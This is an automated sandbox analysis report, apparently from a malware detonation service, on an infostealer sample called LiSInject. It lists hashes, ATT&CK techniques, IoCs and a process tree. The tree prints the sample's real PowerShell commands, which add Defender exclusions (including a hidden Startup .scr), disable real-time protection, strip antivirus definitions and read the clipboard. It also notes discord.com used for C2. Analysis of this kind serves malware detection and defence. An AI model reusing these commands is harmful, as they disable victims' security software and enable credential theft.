8460c3f694cecc25b73bd5374ee5673cfff5031d002516c14d7d4e3a3d4b7a73

Analysis

max time kernel
180s
max time network
187s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-01-2025 16:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LiSInject.zip
Size

8.3MB
MD5

f0e7f323eec5b9568593a99ee9b908b0
SHA1

adadf0292f01a12e476490e5c1dbf3c8770e7d07
SHA256

8460c3f694cecc25b73bd5374ee5673cfff5031d002516c14d7d4e3a3d4b7a73
SHA512

af23e82fea5d409842d932f2c9b7ba845fdb1569700bf636cac3884604d64fc874b0ba9854817bc6f55daf36df8dad6885c0f0e28fffaba2581cdc1df35fb6d4
SSDEEP

196608:OOm1iQVPiySQcwro1LsCSX+dLUpdPwuGgp9QwL51rm6KmNOdRu1udd:O+Iigo3SX4LoCUGY5RXQMo

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4060	powershell.exe
1408	powershell.exe
4616	powershell.exe
3360	powershell.exe
2808	powershell.exe
4560	powershell.exe
1104	powershell.exe
4800	powershell.exe
4700	powershell.exe
4496	powershell.exe
456	powershell.exe
4228	powershell.exe
3108	powershell.exe
1832	powershell.exe
4996	powershell.exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1072	powershell.exe
3620	cmd.exe
3860	powershell.exe
1140	cmd.exe
1648	powershell.exe
3188	cmd.exe

Executes dropped EXE 17 IoCs

pid	Process
4268	LiSInject.exe
3856	LiSInject.exe
564	LiSInject.exe
1932	LiSInject.exe
2416	rar.exe
4140	LiSInject.exe
3104	LiSInject.exe
4284	LiSInject.exe
3420	LiSInject.exe
3376	rar.exe
1456	LiSInject.exe
4776	LiSInject.exe
4232	LiSInject.exe
4576	LiSInject.exe
1172	rar.exe
3484	LiSInject.exe
3472	LiSInject.exe

Loads dropped DLL 64 IoCs

pid	Process
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
3856	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
1932	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3104	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3104	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe
3420	LiSInject.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
4	discord.com
7	discord.com
8	discord.com
13	discord.com
30	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
8	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 12 IoCs

discovery

Process Discovery

T1057

pid	Process
4992	tasklist.exe
5008	tasklist.exe
3000	tasklist.exe
2788	tasklist.exe
2200	tasklist.exe
2340	tasklist.exe
3896	tasklist.exe
3844	tasklist.exe
4592	tasklist.exe
3272	tasklist.exe
2376	tasklist.exe
5032	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab2f-76.dat	upx
behavioral1/memory/3856-80-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp	upx
behavioral1/files/0x001900000002aaf0-83.dat	upx
behavioral1/files/0x001400000002aaf4-136.dat	upx
behavioral1/files/0x001400000002aaf1-135.dat	upx
behavioral1/files/0x001c00000002aaef-134.dat	upx
behavioral1/files/0x001900000002ab35-133.dat	upx
behavioral1/files/0x001900000002ab33-132.dat	upx
behavioral1/files/0x001900000002ab32-131.dat	upx
behavioral1/files/0x001900000002ab2e-128.dat	upx
behavioral1/files/0x001900000002ab2c-127.dat	upx
behavioral1/memory/3856-137-0x00007FFDDE900000-0x00007FFDDE90F000-memory.dmp	upx
behavioral1/files/0x001900000002ab2d-86.dat	upx
behavioral1/memory/3856-85-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp	upx
behavioral1/memory/3856-142-0x00007FFDDDBE0000-0x00007FFDDDC0C000-memory.dmp	upx
behavioral1/memory/3856-144-0x00007FFDDAE20000-0x00007FFDDAE44000-memory.dmp	upx
behavioral1/memory/3856-143-0x00007FFDDDBC0000-0x00007FFDDDBD9000-memory.dmp	upx
behavioral1/memory/3856-145-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp	upx
behavioral1/memory/3856-147-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp	upx
behavioral1/memory/3856-148-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp	upx
behavioral1/memory/3856-146-0x00007FFDDADB0000-0x00007FFDDADC9000-memory.dmp	upx
behavioral1/memory/3856-149-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp	upx
behavioral1/memory/3856-152-0x00007FFDD6DE0000-0x00007FFDD7313000-memory.dmp	upx
behavioral1/memory/3856-153-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp	upx
behavioral1/memory/3856-150-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp	upx
behavioral1/memory/3856-154-0x00007FFDDAC60000-0x00007FFDDAC74000-memory.dmp	upx
behavioral1/memory/3856-156-0x00007FFDDADF0000-0x00007FFDDADFD000-memory.dmp	upx
behavioral1/memory/3856-155-0x00007FFDDDBE0000-0x00007FFDDDC0C000-memory.dmp	upx
behavioral1/memory/3856-157-0x00007FFDC8F10000-0x00007FFDC902A000-memory.dmp	upx
behavioral1/memory/3856-249-0x00007FFDDAE20000-0x00007FFDDAE44000-memory.dmp	upx
behavioral1/memory/3856-250-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp	upx
behavioral1/memory/1932-251-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp	upx
behavioral1/memory/1932-254-0x00007FFDDAC30000-0x00007FFDDAC3F000-memory.dmp	upx
behavioral1/memory/3856-253-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp	upx
behavioral1/memory/1932-252-0x00007FFDDA620000-0x00007FFDDA645000-memory.dmp	upx
behavioral1/memory/3856-270-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp	upx
behavioral1/memory/1932-272-0x00007FFDD6CF0000-0x00007FFDD6D1C000-memory.dmp	upx
behavioral1/memory/3856-271-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp	upx
behavioral1/memory/1932-280-0x00007FFDC9800000-0x00007FFDC9833000-memory.dmp	upx
behavioral1/memory/3856-281-0x00007FFDC8F10000-0x00007FFDC902A000-memory.dmp	upx
behavioral1/memory/1932-279-0x00007FFDDA5A0000-0x00007FFDDA5AD000-memory.dmp	upx
behavioral1/memory/1932-282-0x00007FFDC1310000-0x00007FFDC13DE000-memory.dmp	upx
behavioral1/memory/1932-278-0x00007FFDC9840000-0x00007FFDC9859000-memory.dmp	upx
behavioral1/memory/1932-284-0x00007FFDBFB20000-0x00007FFDC0053000-memory.dmp	upx
behavioral1/memory/1932-309-0x00007FFDC9800000-0x00007FFDC9833000-memory.dmp	upx
behavioral1/memory/1932-310-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp	upx
behavioral1/memory/1932-308-0x00007FFDDA5A0000-0x00007FFDDA5AD000-memory.dmp	upx
behavioral1/memory/1932-307-0x00007FFDC9840000-0x00007FFDC9859000-memory.dmp	upx
behavioral1/memory/1932-306-0x00007FFDD6CD0000-0x00007FFDD6CE9000-memory.dmp	upx
behavioral1/memory/1932-305-0x00007FFDC1770000-0x00007FFDC18EF000-memory.dmp	upx
behavioral1/memory/1932-304-0x00007FFDD6CF0000-0x00007FFDD6D1C000-memory.dmp	upx
behavioral1/memory/1932-303-0x00007FFDDA620000-0x00007FFDDA645000-memory.dmp	upx
behavioral1/memory/1932-302-0x00007FFDC1310000-0x00007FFDC13DE000-memory.dmp	upx
behavioral1/memory/1932-301-0x00007FFDC97E0000-0x00007FFDC97F4000-memory.dmp	upx
behavioral1/memory/1932-300-0x00007FFDD67C0000-0x00007FFDD67E4000-memory.dmp	upx
behavioral1/memory/1932-299-0x00007FFDDAC30000-0x00007FFDDAC3F000-memory.dmp	upx
behavioral1/memory/1932-298-0x00007FFDDA570000-0x00007FFDDA57D000-memory.dmp	upx
behavioral1/memory/1932-296-0x00007FFDBFB20000-0x00007FFDC0053000-memory.dmp	upx
behavioral1/memory/1932-285-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp	upx
behavioral1/memory/1932-277-0x00007FFDC1770000-0x00007FFDC18EF000-memory.dmp	upx
behavioral1/memory/3856-275-0x00007FFDD6DE0000-0x00007FFDD7313000-memory.dmp	upx
behavioral1/memory/1932-274-0x00007FFDD6CD0000-0x00007FFDD6CE9000-memory.dmp	upx
behavioral1/memory/1932-276-0x00007FFDD67C0000-0x00007FFDD67E4000-memory.dmp	upx
behavioral1/memory/3856-451-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3868	cmd.exe
4664	netsh.exe
5104	cmd.exe
1596	netsh.exe
2336	cmd.exe
2524	netsh.exe

Detects videocard installed 1 TTPs 9 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
420	WMIC.exe
4224	WMIC.exe
1496	WMIC.exe
5084	WMIC.exe
4908	WMIC.exe
1460	WMIC.exe
1620	WMIC.exe
684	WMIC.exe
2856	WMIC.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1532	systeminfo.exe
3148	systeminfo.exe
4092	systeminfo.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2372	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1832	powershell.exe
1104	powershell.exe
1104	powershell.exe
1832	powershell.exe
4996	powershell.exe
4996	powershell.exe
2924	7zFM.exe
2924	7zFM.exe
3860	powershell.exe
3860	powershell.exe
2372	powershell.exe
2372	powershell.exe
3860	powershell.exe
2372	powershell.exe
4616	powershell.exe
4616	powershell.exe
1800	powershell.exe
1800	powershell.exe
3360	powershell.exe
3360	powershell.exe
1956	powershell.exe
1956	powershell.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
4800	powershell.exe
4496	powershell.exe
4496	powershell.exe
4800	powershell.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
456	powershell.exe
1648	powershell.exe
1648	powershell.exe
456	powershell.exe
456	powershell.exe
1648	powershell.exe
3440	powershell.exe
3440	powershell.exe
3440	powershell.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2924	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2924	7zFM.exe
Token: 35	2924	7zFM.exe
Token: SeSecurityPrivilege	2924	7zFM.exe
Token: SeDebugPrivilege	2200	tasklist.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe
Token: 33	4496	WMIC.exe
Token: 34	4496	WMIC.exe
Token: 35	4496	WMIC.exe
Token: 36	4496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe
Token: 33	4496	WMIC.exe
Token: 34	4496	WMIC.exe
Token: 35	4496	WMIC.exe
Token: 36	4496	WMIC.exe
Token: SeSecurityPrivilege	2924	7zFM.exe
Token: SeIncreaseQuotaPrivilege	1460	WMIC.exe
Token: SeSecurityPrivilege	1460	WMIC.exe
Token: SeTakeOwnershipPrivilege	1460	WMIC.exe
Token: SeLoadDriverPrivilege	1460	WMIC.exe
Token: SeSystemProfilePrivilege	1460	WMIC.exe
Token: SeSystemtimePrivilege	1460	WMIC.exe
Token: SeProfSingleProcessPrivilege	1460	WMIC.exe
Token: SeIncBasePriorityPrivilege	1460	WMIC.exe
Token: SeCreatePagefilePrivilege	1460	WMIC.exe
Token: SeBackupPrivilege	1460	WMIC.exe
Token: SeRestorePrivilege	1460	WMIC.exe
Token: SeShutdownPrivilege	1460	WMIC.exe
Token: SeDebugPrivilege	1460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1460	WMIC.exe
Token: SeRemoteShutdownPrivilege	1460	WMIC.exe

Suspicious use of FindShellTrayWindow 17 IoCs

pid	Process
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe
2924	7zFM.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
812	OpenWith.exe
2352	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2924 wrote to memory of 4268	2924	7zFM.exe	77
PID 2924 wrote to memory of 4268	2924	7zFM.exe	77
PID 4268 wrote to memory of 3856	4268	LiSInject.exe	80
PID 4268 wrote to memory of 3856	4268	LiSInject.exe	80
PID 3856 wrote to memory of 3040	3856	LiSInject.exe	81
PID 3856 wrote to memory of 3040	3856	LiSInject.exe	81
PID 3856 wrote to memory of 1208	3856	LiSInject.exe	82
PID 3856 wrote to memory of 1208	3856	LiSInject.exe	82
PID 3856 wrote to memory of 4864	3856	LiSInject.exe	84
PID 3856 wrote to memory of 4864	3856	LiSInject.exe	84
PID 4864 wrote to memory of 2200	4864	cmd.exe	87
PID 4864 wrote to memory of 2200	4864	cmd.exe	87
PID 3040 wrote to memory of 1832	3040	cmd.exe	88
PID 3040 wrote to memory of 1832	3040	cmd.exe	88
PID 1208 wrote to memory of 1104	1208	cmd.exe	129
PID 1208 wrote to memory of 1104	1208	cmd.exe	129
PID 3856 wrote to memory of 2484	3856	LiSInject.exe	90
PID 3856 wrote to memory of 2484	3856	LiSInject.exe	90
PID 2484 wrote to memory of 4496	2484	cmd.exe	93
PID 2484 wrote to memory of 4496	2484	cmd.exe	93
PID 2924 wrote to memory of 564	2924	7zFM.exe	94
PID 2924 wrote to memory of 564	2924	7zFM.exe	94
PID 3856 wrote to memory of 3860	3856	LiSInject.exe	133
PID 3856 wrote to memory of 3860	3856	LiSInject.exe	133
PID 564 wrote to memory of 1932	564	LiSInject.exe	97
PID 564 wrote to memory of 1932	564	LiSInject.exe	97
PID 3860 wrote to memory of 4560	3860	cmd.exe	98
PID 3860 wrote to memory of 4560	3860	cmd.exe	98
PID 3856 wrote to memory of 2628	3856	LiSInject.exe	99
PID 3856 wrote to memory of 2628	3856	LiSInject.exe	99
PID 2628 wrote to memory of 664	2628	cmd.exe	101
PID 2628 wrote to memory of 664	2628	cmd.exe	101
PID 3856 wrote to memory of 2984	3856	LiSInject.exe	102
PID 3856 wrote to memory of 2984	3856	LiSInject.exe	102
PID 2984 wrote to memory of 1460	2984	cmd.exe	104
PID 2984 wrote to memory of 1460	2984	cmd.exe	104
PID 3856 wrote to memory of 752	3856	LiSInject.exe	105
PID 3856 wrote to memory of 752	3856	LiSInject.exe	105
PID 752 wrote to memory of 420	752	cmd.exe	107
PID 752 wrote to memory of 420	752	cmd.exe	107
PID 3856 wrote to memory of 3952	3856	LiSInject.exe	108
PID 3856 wrote to memory of 3952	3856	LiSInject.exe	108
PID 3952 wrote to memory of 4996	3952	cmd.exe	110
PID 3952 wrote to memory of 4996	3952	cmd.exe	110
PID 3856 wrote to memory of 2312	3856	LiSInject.exe	111
PID 3856 wrote to memory of 2312	3856	LiSInject.exe	111
PID 3856 wrote to memory of 1620	3856	LiSInject.exe	182
PID 3856 wrote to memory of 1620	3856	LiSInject.exe	182
PID 2312 wrote to memory of 3896	2312	cmd.exe	115
PID 2312 wrote to memory of 3896	2312	cmd.exe	115
PID 1620 wrote to memory of 2340	1620	cmd.exe	116
PID 1620 wrote to memory of 2340	1620	cmd.exe	116
PID 3856 wrote to memory of 1844	3856	LiSInject.exe	117
PID 3856 wrote to memory of 1844	3856	LiSInject.exe	117
PID 3856 wrote to memory of 3620	3856	LiSInject.exe	174
PID 3856 wrote to memory of 3620	3856	LiSInject.exe	174
PID 3856 wrote to memory of 1452	3856	LiSInject.exe	121
PID 3856 wrote to memory of 1452	3856	LiSInject.exe	121
PID 3856 wrote to memory of 5064	3856	LiSInject.exe	122
PID 3856 wrote to memory of 5064	3856	LiSInject.exe	122
PID 3856 wrote to memory of 3868	3856	LiSInject.exe	178
PID 3856 wrote to memory of 3868	3856	LiSInject.exe	178
PID 3856 wrote to memory of 1940	3856	LiSInject.exe	126
PID 3856 wrote to memory of 1940	3856	LiSInject.exe	126

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\LiSInject.zip"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4864
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2484
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3860
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:4560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2628
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2984
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:1460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:752
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‍ .scr'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‍ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1620
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:1844
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:4484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
